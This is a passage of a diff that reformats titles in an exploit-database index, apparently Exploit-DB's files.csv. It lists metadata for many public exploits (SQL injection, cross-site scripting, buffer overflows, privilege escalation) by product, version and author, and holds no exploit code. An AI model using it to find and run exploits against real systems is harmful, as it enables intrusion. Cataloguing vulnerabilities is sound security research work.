Antipov",php,webapps,0 -24652,platforms/php/webapps/24652.txt,"W-Agora 4.1.6 - a login.php loginuser Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 +24652,platforms/php/webapps/24652.txt,"W-Agora 4.1.6 - a 'login.php' loginuser Parameter Cross-Site Scripting",2004-09-30,"Alexander Antipov",php,webapps,0 24653,platforms/windows/remote/24653.txt,"VyPRESS Messenger 3.5 - Remote Buffer Overflow",2004-10-01,"Luigi Auriemma",windows,remote,0 24654,platforms/multiple/remote/24654.txt,"Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation",2004-10-04,"Eric Lackey",multiple,remote,0 24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0 @@ -21890,7 +21892,7 @@ id,file,description,date,author,platform,type,port 24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",windows,dos,0 24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - send.php tid Parameter Cross-Site Scripting",2004-11-12,"digital ex",php,webapps,0 24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 -24736,platforms/php/webapps/24736.txt,"PHPWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 +24736,platforms/php/webapps/24736.txt,"phpWebSite 0.7.3/0.8.x/0.9.3 - User Module HTTP Response Splitting",2004-11-04,"Maestro De-Seguridad",php,webapps,0 24737,platforms/php/webapps/24737.txt,"Mark Zuckerberg Thefacebook - Multiple Cross-Site Scripting Vulnerabilities",2004-11-13,"Alex Lanstein",php,webapps,0 24738,platforms/windows/dos/24738.c,"AlShare Software NetNote Server 2.2 - Remote Denial of Service",2004-11-13,class101,windows,dos,0 24739,platforms/php/webapps/24739.txt,"PowerPortal 1.3 - SQL Injection",2004-11-14,ruggine,php,webapps,0 @@ -21901,11 +21903,11 @@ id,file,description,date,author,platform,type,port 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 < 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0 24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer - ActiveX Remote Code Execution",2013-03-13,Metasploit,windows,remote,0 24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 -24747,platforms/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0 +24747,platforms/linux/dos/24747.c,"Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0 24748,platforms/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0 24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0 -24751,platforms/php/webapps/24751.pl,"PHPBB 2.0.x - admin_cash.php Remote PHP File Include",2004-11-17,"Jerome Athias",php,webapps,0 +24751,platforms/php/webapps/24751.pl,"phpBB 2.0.x - admin_cash.php Remote PHP File Include",2004-11-17,"Jerome Athias",php,webapps,0 24752,platforms/php/webapps/24752.txt,"Invision Power Board 2.0 - 'index.php' Post Action SQL Injection",2004-11-18,anonymous,php,webapps,0 24753,platforms/windows/local/24753.txt,"Mailtraq 2.x - Administration Console Privilege Escalation",2004-11-19,"Reed Arvin",windows,local,0 24754,platforms/windows/local/24754.txt,"Altiris Deployment Solution 5.6 - Client Service Privilege Escalation",2004-11-19,"Reed Arvin",windows,local,0 @@ -21977,12 +21979,12 @@ id,file,description,date,author,platform,type,port 24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0 24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.threads 6.2.3/6.5 - showflat.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.threads 6.2.3/6.5 - calendar.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 -24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 +24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 - 'login.php' Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter Cross-Site Scripting",2004-12-13,"dw. and ms.",php,webapps,0 24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 - KDE KFMCLIENT Remote Command Execution",2004-12-13,"Giovanni Delvecchio",linux,dos,0 -24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - login.php URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - login.php Username Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 -24831,platforms/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - login.php Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24829,platforms/php/webapps/24829.txt,"PHPGedView 2.5/2.6 - 'login.php' URL Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24830,platforms/php/webapps/24830.txt,"PHPGedView 2.5/2.6 - 'login.php' Username Parameter Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 +24831,platforms/php/webapps/24831.txt,"PHPGedView 2.5/2.6 - 'login.php' Newlanguage Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24832,platforms/php/webapps/24832.txt,"PHPGedView 2.5/2.6 - Relationship.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24852,platforms/linux/remote/24852.txt,"MPG123 0.59 - Find Next File Remote Client-Side Buffer Overflow",2004-12-15,"Bartlomiej Sieka",linux,remote,0 24853,platforms/linux/remote/24853.c,"MPlayer 0.9/1.0 - MMST Get_Header Remote Client-Side Buffer Overflow",2004-12-15,"Ariel Berkman",linux,remote,0 @@ -22010,7 +22012,7 @@ id,file,description,date,author,platform,type,port 24858,platforms/php/webapps/24858.html,"Wordpress Occasions Plugin 1.0.4 - Cross-Site Request Forgery",2013-03-19,m3tamantra,php,webapps,0 24859,platforms/php/webapps/24859.rb,"Wordpress Count per Day Plugin 3.2.5 - (counter.php) Cross-Site Scripting",2013-03-19,m3tamantra,php,webapps,0 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery",2013-03-19,"Jacob Holcomb",hardware,webapps,0 -24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id parameter'SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 +24861,platforms/php/webapps/24861.txt,"Rebus:list - 'list.php list_id parameter' SQL Injection",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 @@ -22043,7 +22045,7 @@ id,file,description,date,author,platform,type,port 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0 24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow SEH",2013-03-29,"Myo Soe",windows,remote,0 -24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid parameter'SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 +24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid parameter' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution",2013-04-12,Metasploit,linux,remote,5666 @@ -22070,7 +22072,7 @@ id,file,description,date,author,platform,type,port 24927,platforms/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,php,webapps,0 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery",2013-04-08,Un0wn_X,hardware,webapps,0 24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Privilege Escalation",2013-04-08,Metasploit,linux,local,0 -24930,platforms/windows/dos/24930.txt,"Groovy Media Player 3.2.0 - '.mp3'Buffer Overflow",2013-04-08,"Akshaysinh Vaghela",windows,dos,0 +24930,platforms/windows/dos/24930.txt,"Groovy Media Player 3.2.0 - '.mp3' Buffer Overflow",2013-04-08,"Akshaysinh Vaghela",windows,dos,0 24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B - setup.cgi Remote Command Execution",2013-04-08,Metasploit,hardware,remote,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 @@ -22272,7 +22274,7 @@ id,file,description,date,author,platform,type,port 25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database Description Parameter Cross-Site Scripting",2005-02-17,"Patrick Hof",php,webapps,0 25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0 -25122,platforms/linux/remote/25122.txt,"glFTPD 1.x/2.0 ZIP Plugins - Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",linux,remote,0 +25122,platforms/linux/remote/25122.txt,"glFTPd 1.x/2.0 'ZIP' Plugins - Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",linux,remote,0 25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - Long GET Request Denial of Service",2005-02-19,MurDoK,hardware,dos,0 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0 @@ -22311,21 +22313,21 @@ id,file,description,date,author,platform,type,port 25158,platforms/php/webapps/25158.txt,"OOApp GuestBook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 -25161,platforms/php/webapps/25161.txt,"PHPWebSite 0.x - Image File Processing Arbitrary PHP File Upload",2005-02-24,tjomka,php,webapps,0 +25161,platforms/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary PHP File Upload",2005-02-24,tjomka,php,webapps,0 25162,platforms/php/webapps/25162.txt,"CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,php,webapps,0 25163,platforms/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Remote Directory Traversal",2005-02-25,CorryL,windows,remote,0 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0 25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos,0 25166,platforms/windows/remote/25166.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (1)",2004-12-26,"Miguel Tarasc",windows,remote,0 25167,platforms/windows/remote/25167.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (2)",2005-02-27,class101,windows,remote,0 -25168,platforms/php/webapps/25168.c,"PHPBB 2.0.x - Authentication Bypass (1)",2005-02-28,Paisterist,php,webapps,0 -25169,platforms/php/webapps/25169.pl,"PHPBB 2.0.x - Authentication Bypass (2)",2005-02-28,phuket,php,webapps,0 -25170,platforms/php/webapps/25170.cpp,"PHPBB 2.0.x - Authentication Bypass (3)",2005-02-28,overdose,php,webapps,0 +25168,platforms/php/webapps/25168.c,"phpBB 2.0.x - Authentication Bypass (1)",2005-02-28,Paisterist,php,webapps,0 +25169,platforms/php/webapps/25169.pl,"phpBB 2.0.x - Authentication Bypass (2)",2005-02-28,phuket,php,webapps,0 +25170,platforms/php/webapps/25170.cpp,"phpBB 2.0.x - Authentication Bypass (3)",2005-02-28,overdose,php,webapps,0 25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",multiple,dos,0 25172,platforms/php/webapps/25172.txt,"PostNuke Phoenix 0.7x - CATID Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x - SHOW Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 25174,platforms/php/webapps/25174.txt,"PHPCOIN 1.2 - mod.php Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 -25175,platforms/php/webapps/25175.txt,"PHPCOIN 1.2 - login.php Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 +25175,platforms/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - SendPM.php Directory Traversal",2005-03-01,Raven,php,webapps,0 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - X-Forwarded-For Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 @@ -22438,7 +22440,7 @@ id,file,description,date,author,platform,type,port 25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25301,platforms/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 -25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap-Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 +25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0 33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 @@ -22480,8 +22482,8 @@ id,file,description,date,author,platform,type,port 25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x - Downloads Module Lid Parameter Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25342,platforms/php/webapps/25342.txt,"PHP-Nuke 7.6 - Web_Links Module Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 25343,platforms/php/webapps/25343.txt,"PHP-Nuke 7.6 - banners.php Cross-Site Scripting",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 -25344,platforms/php/webapps/25344.txt,"PHPBB 2.0.13 DLMan Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 -25345,platforms/php/webapps/25345.txt,"PHPBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 +25344,platforms/php/webapps/25344.txt,"phpBB 2.0.13 DLMan Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 +25345,platforms/php/webapps/25345.txt,"phpBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25346,platforms/asp/webapps/25346.txt,"Active Auction House - default.asp Multiple SQL Injection",2005-04-06,Dcrab,asp,webapps,0 25347,platforms/asp/webapps/25347.txt,"Active Auction House - ItemInfo.asp SQL Injection",2005-04-06,Dcrab,asp,webapps,0 25348,platforms/asp/webapps/25348.txt,"Active Auction House - start.asp ReturnURL Parameter Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 @@ -22539,13 +22541,13 @@ id,file,description,date,author,platform,type,port 25400,platforms/php/webapps/25400.txt,"PHPBB2 Plus 1.5 - Portal.php Multiple Cross-Site Scripting Vulnerabilities",2005-04-13,Dcrab,php,webapps,0 25401,platforms/php/webapps/25401.txt,"PHPBB2 Plus 1.5 - viewtopic.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25402,platforms/hardware/dos/25402.txt,"LG U8120 Mobile Phone - .MIDI File Remote Denial of Service",2005-04-13,"Luca Ercoli",hardware,dos,0 -25403,platforms/php/webapps/25403.txt,"PHPBB Photo Album 2.0.53 Module - Album_Cat.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 -25404,platforms/php/webapps/25404.txt,"PHPBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 +25403,platforms/php/webapps/25403.txt,"phpBB Photo Album 2.0.53 Module - Album_Cat.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 +25404,platforms/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25405,platforms/php/webapps/25405.txt,"GetSimpleCMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",php,webapps,0 25406,platforms/linux/local/25406.sh,"Kloxo 6.1.6 - Privilege Escalation",2013-05-13,HTP,linux,local,0 25408,platforms/windows/dos/25408.pl,"Windows Media Player 11.0.0 - '.wav' Crash (PoC)",2013-05-13,Asesino04,windows,dos,0 25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 -25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster - 'index.php id parameter'SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 +25410,platforms/php/webapps/25410.txt,"Joomla S5 Clan Roster com_s5clanroster - 'index.php id parameter' SQL Injection",2013-05-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 25411,platforms/linux/local/25411.py,"No-IP Dynamic Update Client (DUC) 2.1.9 - Local IP Address Stack Overflow",2013-05-13,"Alberto Ortega",linux,local,0 25412,platforms/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 @@ -22567,8 +22569,8 @@ id,file,description,date,author,platform,type,port 25429,platforms/linux/dos/25429.c,"Libsafe 2.0 - Multi-threaded Process Race Condition Security Bypass",2005-04-15,Overflow.pl,linux,dos,0 25430,platforms/php/webapps/25430.txt,"PHP-Nuke 7.6 Surveys Module - HTTP Response Splitting",2005-04-15,Dcrab,php,webapps,0 25431,platforms/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Inclusion",2006-10-19,"Fidel Costa",php,webapps,0 -25432,platforms/php/webapps/25432.txt,"PHPBB Remote - mod.php SQL Injection",2005-04-16,"tom cruise",php,webapps,0 -25433,platforms/php/webapps/25433.txt,"Datenbank Module For PHPBB - Remote mod.php Cross-Site Scripting",2005-04-16,"tom cruise",php,webapps,0 +25432,platforms/php/webapps/25432.txt,"phpBB Remote - mod.php SQL Injection",2005-04-16,"tom cruise",php,webapps,0 +25433,platforms/php/webapps/25433.txt,"Datenbank Module For phpBB - Remote mod.php Cross-Site Scripting",2005-04-16,"tom cruise",php,webapps,0 25434,platforms/php/webapps/25434.txt,"eGroupWare 1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps,0 25435,platforms/php/webapps/25435.txt,"eGroupWare 1.0 - sitemgr-site/index.php category_id Parameter Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps,0 25436,platforms/php/webapps/25436.txt,"eGroupWare 1.0 - tts/index.php filter Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 @@ -22586,7 +22588,7 @@ id,file,description,date,author,platform,type,port 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 - ERS File Handling Buffer Overflow",2013-05-14,Metasploit,windows,local,0 25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 -25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 +25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database - SUBSCRIPTION_NAME SQL Injection (1)",2007-02-23,bunker,multiple,remote,0 25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database - SUBSCRIPTION_NAME SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 25454,platforms/windows/remote/25454.txt,"Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection",2005-04-19,"GreyMagic Software",windows,remote,0 @@ -22604,8 +22606,8 @@ id,file,description,date,author,platform,type,port 25470,platforms/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service",2005-04-20,"Adam Baldwin",multiple,dos,0 25472,platforms/windows/dos/25472.py,"Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service",2013-05-15,Sapling,windows,dos,0 25473,platforms/php/webapps/25473.txt,"PHP Labs - .proFile File URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 -25474,platforms/php/webapps/25474.txt,"PHPBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 -25475,platforms/php/webapps/25475.txt,"PHPBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 +25474,platforms/php/webapps/25474.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 +25475,platforms/php/webapps/25475.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 - default.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25477,platforms/asp/webapps/25477.txt,"DUportal Pro 3.4 - search.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25478,platforms/asp/webapps/25478.txt,"DUportal Pro 3.4 - inc_vote.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 @@ -22616,7 +22618,7 @@ id,file,description,date,author,platform,type,port 25483,platforms/asp/webapps/25483.txt,"DUportal 3.1.2 - inc_poll_voting.asp DAT_PARENT Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 - type.asp iCat Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 - inc_rating.asp Multiple Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25486,platforms/windows/remote/25486.txt,"RaidenFTPD 2.4 - Unauthorized File Access",2005-04-21,"Lachlan. H",windows,remote,0 +25486,platforms/windows/remote/25486.txt,"RaidenFTPd 2.4 - Unauthorized File Access",2005-04-21,"Lachlan. H",windows,remote,0 25487,platforms/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal",2005-04-21,"Donato Ferrante",windows,remote,0 25488,platforms/php/webapps/25488.txt,"ProfitCode Software PayProCart 3.0 - Username Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 25489,platforms/php/webapps/25489.txt,"ProfitCode Software PayProCart 3.0 - Ckprvd Cross-Site Scripting",2005-04-21,Lostmon,php,webapps,0 @@ -22646,15 +22648,15 @@ id,file,description,date,author,platform,type,port 25513,platforms/asp/webapps/25513.txt,"CartWIZ 1.10 - AddToWishlist.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25514,platforms/asp/webapps/25514.txt,"CartWIZ 1.10 - Access.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25515,platforms/asp/webapps/25515.txt,"CartWIZ 1.10 - error.asp Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25516,platforms/asp/webapps/25516.txt,"CartWIZ 1.10 - login.asp Redirect Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25516,platforms/asp/webapps/25516.txt,"CartWIZ 1.10 - 'login.asp' Redirect Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25517,platforms/linux/remote/25517.rb,"Mutiny 5 - Arbitrary File Upload",2013-05-17,Metasploit,linux,remote,0 25518,platforms/php/webapps/25518.txt,"Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities",2013-05-17,"High-Tech Bridge SA",php,webapps,0 25519,platforms/php/webapps/25519.txt,"ZPanel - templateparser.class.php Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",php,webapps,0 -25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 - login.asp Message Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 +25520,platforms/asp/webapps/25520.txt,"CartWIZ 1.10 - 'login.asp' Message Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25521,platforms/asp/webapps/25521.txt,"CartWIZ 1.10 - searchresults.asp SKU Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25522,platforms/asp/webapps/25522.txt,"CartWIZ 1.10 - searchresults.asp Name Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 -25523,platforms/php/webapps/25523.txt,"PHPBB 2.0.x - profile.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 -25524,platforms/php/webapps/25524.txt,"PHPBB 2.0.x - viewtopic.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 +25523,platforms/php/webapps/25523.txt,"phpBB 2.0.x - profile.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 +25524,platforms/php/webapps/25524.txt,"phpBB 2.0.x - viewtopic.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 25525,platforms/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (1)",2005-04-25,kf,linux,dos,0 25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (2)",2005-04-25,kf,linux,remote,0 25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x - 